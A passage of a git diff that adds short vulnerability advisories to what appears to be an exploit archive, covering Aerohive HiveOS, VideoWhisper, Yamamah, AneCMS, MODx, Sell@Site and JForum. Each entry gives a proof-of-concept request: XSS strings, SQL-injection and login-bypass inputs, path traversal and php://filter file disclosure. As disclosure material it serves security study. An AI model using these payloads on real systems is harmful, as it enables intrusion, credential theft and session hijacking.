vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. 
All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/php/webapps/34038.txt b/platforms/php/webapps/34038.txt new file mode 100755 index 000000000..42589ea57 --- /dev/null +++ b/platforms/php/webapps/34038.txt 
@@ -0,0 +1,53 @@
+# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
+# Date: 11-07-2014
+# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
+# Vendor Homepage: http://www.aerohive.com/products/overview.html
+# Version: 5.1r5 - 6.1r5 (possibly earlier versions)
+
+Description
+================
+Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further).
+It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.
+
+Details
+================
+AeroHive HiveOS Version: 5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
+
+
+Vulnerability
+================
+An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.
+
+
+Proof of concept XSS
+====================
+Base: http:///index.php5?ERROR_INFO=
+echo -en '">' | base64
+Add the output to the ERROR_INFO variable.
+
+Example:
+http:///index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
+
+Proof of concept LFI
+====================
+Base: http:///action.php5?_action=get&_actionType=1&_page=
+
+Example:
+http:///action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
+
+
+Fix
+================
+The vulnerabilities were resolved in version 6.1r5.
+
+
+Disclosure Timeline
+================
+
+2014-03-12: Reported to vendor
+2014-03-12: Vendor confirmed, gave tracking-id
+2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
+2014-04-02: Requested status update
+2014-04-02: Vendor indicates they once the new version is released
+2014-07-07: Requested status update
+2014-07-07: Vendor indicated the update was previously published
diff --git a/platforms/php/webapps/34137.txt b/platforms/php/webapps/34137.txt
new file mode 100755
index 000000000..f2b0553be
--- /dev/null
+++ b/platforms/php/webapps/34137.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40828/info
+
+The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/index.php?r=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/34138.txt b/platforms/php/webapps/34138.txt
new file mode 100755
index 000000000..989b3c4e9
--- /dev/null
+++ b/platforms/php/webapps/34138.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40832/info
+
+VideoWhisper PHP 2 Way Video Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34139.txt b/platforms/php/webapps/34139.txt
new file mode 100755
index 000000000..f96d18573
--- /dev/null
+++ b/platforms/php/webapps/34139.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40834/info
+
+Yamamah Photo Gallery is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+Yamamah 1.00 is vulnerable; other versions may also be affected.
+
+http://www.example.com/themes/default/download.php?dfownload=../../includes/config.inc.php
\ No newline at end of file
diff --git a/platforms/php/webapps/34140.txt b/platforms/php/webapps/34140.txt
new file mode 100755
index 000000000..f91fe04df
--- /dev/null
+++ b/platforms/php/webapps/34140.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40838/info
+
+
+AneCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+AneCMS 1.3 is vulnerable; other versions may also be affected.
+
+hello
\ No newline at end of file
diff --git a/platforms/php/webapps/34141.txt b/platforms/php/webapps/34141.txt
new file mode 100755
index 000000000..1cc5b5de0
--- /dev/null
+++ b/platforms/php/webapps/34141.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40840/info
+
+AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AneCMS 1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63
\ No newline at end of file
diff --git a/platforms/php/webapps/34142.txt b/platforms/php/webapps/34142.txt
new file mode 100755
index 000000000..4e89d19cd
--- /dev/null
+++ b/platforms/php/webapps/34142.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40841/info
+
+MODx is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MODx 1.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/manager/index.php?id=4%27+ANY_SQL&a=16
+http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE
\ No newline at end of file
diff --git a/platforms/php/webapps/34144.txt b/platforms/php/webapps/34144.txt
new file mode 100755
index 000000000..5b8d7b5ea
--- /dev/null
+++ b/platforms/php/webapps/34144.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40860/info
+
+The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example URI is available:
+
+http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/34146.txt b/platforms/php/webapps/34146.txt
new file mode 100755
index 000000000..cb21c66b1
--- /dev/null
+++ b/platforms/php/webapps/34146.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/40869/info
+
+Sell@Site PHP Online Jobs is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+The following example data are available:
+
+Username: a' or '1'='1
+Password: a' or '1'='1
\ No newline at end of file
diff --git a/platforms/php/webapps/34147.txt b/platforms/php/webapps/34147.txt
new file mode 100755
index 000000000..872d7d936
--- /dev/null
+++ b/platforms/php/webapps/34147.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40880/info
+
+JForum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+JForum 2.1.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=?>